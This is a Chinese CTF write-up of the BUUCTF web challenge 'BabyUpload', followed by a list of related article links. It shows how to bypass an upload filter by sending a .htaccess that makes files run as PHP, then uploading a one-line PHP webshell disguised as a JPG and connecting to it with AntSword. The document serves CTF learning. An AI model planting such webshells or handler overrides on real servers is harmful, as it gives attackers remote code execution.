BUUCTF-web刷题篇(17)

26.BabyUpload

源码:https://github.com/imaginiso/GXY_CTF/tree/master/Web/babyupload

查看题目源码:

写着:SetHandler application/x-httpd-php

通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性,倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码,这个是需要注意的。

.htaccess配置文件特性:

概述来说,.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

.htaccess配置文件格式

<FileMatch "xxx.jpg>

SetHandler application/x-httpd-php

创建.htaccess配置文件

SetHandler application/x-httpd-php

Kali或者主机创建txt文件输入上面的配置命令,并将其命名为111.jpg文件

上传.htaccess配置文件(111.jpg):

BP抓包:

这里猜测.htaccess文件被过滤,所以不能直接上传.htaccess配置文件,先截断数据包再把上传的111.jpg文件更名为.htaccess文件,如图:

action到repeater,并send,htaccess配置文件上传成功:

上传成功,现在我们的jpg一句话木马文件就可以上传并且可以当作php代码来执行了

创建木马文件

<script language='php'>@eval($_REQUEST['shell']);</script>

在Kali里面创建txt文件,输入以上代码,并将其保存命名为flag.jpg

上传木马文件

action到repeater中,send之后上传成功,访问上传路径链接:

http://b326957d-5245-4605-9d10-cf909d20a176.node5.buuoj.cn:81/upload/88a808fad157cecb392184390efb5967/flag.jpg

并未呈现图片格式,访问成功。

中国蚁剑连接:

连接成功后根目录后找到flag。

相关推荐
盟接之桥1 小时前
盟接之桥说制造:在安全、确定与及时之间,构建品质、交期与反应速度的动态平衡
大数据·运维·安全·汽车·制造·devops
Suckerbin2 小时前
DarkHole: 2靶场渗透
笔记·安全·web安全·网络安全
喜葵2 小时前
前端安全防护深度实践:从XSS到供应链攻击的全面防御
前端·安全·xss
泰迪智能科技3 小时前
案例分享|企微智能会话风控系统:为尚丰盈铝业筑牢沟通安全防线
安全·企业微信
练习时长两年半的Java练习生(升级中)4 小时前
从0开始学习Java+AI知识点总结-30.前端web开发(JS+Vue+Ajax)
前端·javascript·vue.js·学习·web
lingggggaaaa4 小时前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE
redis·笔记·学习·算法·安全·网络安全·couchdb
MoloXuanhe5 小时前
[TryHackMe]Wordpress: CVE-2021-29447(wp漏洞利用-SSRF+WpGetShell)
运维·网络·安全·tryhackme·thm
wanhengidc5 小时前
网页版的云手机都有哪些优势?
运维·网络·安全·游戏·智能手机
czijin8 小时前
【论文阅读】Security of Language Models for Code: A Systematic Literature Review
论文阅读·人工智能·安全·语言模型·软件工程
2501_915921438 小时前
iOS混淆工具实战 在线教育直播类 App 的课程与互动安全防护
android·安全·ios·小程序·uni-app·iphone·webview